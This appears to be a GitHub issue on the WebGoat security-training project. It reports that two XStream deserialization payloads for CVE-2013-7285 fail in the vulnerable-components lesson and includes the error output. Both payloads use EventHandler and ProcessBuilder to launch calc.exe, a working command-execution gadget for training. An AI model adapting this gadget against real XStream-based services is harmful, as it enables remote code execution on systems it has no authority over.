Closed
Labels: waiting for release (Issue is fix, waiting on new release)
Description
I have tried the following variations that are "supposed" to work as mentioned in:
- The hint: https://x-stream.github.io/CVE-2013-7285.html,
- In the Test file: https://github.com/WebGoat/WebGoat/blob/main/webgoat-lessons/vulnerable-components/src/test/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLessonTest.java:
```xml
<contact class='org.owasp.webgoat.vulnerable_components.Contact'>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>
```

```xml
<contact class='dynamic-proxy'>
  <interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>
```
Both give similar errors like so:
```
Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
---- Debugging information ----
message             : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
cause-exception     : com.thoughtworks.xstream.converters.reflection.ObjectAccessException
cause-message       : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
class               : org.owasp.webgoat.vulnerable_components.Contact
required-type       : org.owasp.webgoat.vulnerable_components.Contact
converter-type      : com.thoughtworks.xstream.converters.reflection.ReflectionConverter
path                : /contact
line number         : 1
version             : 1.4.5
-------------------------------
```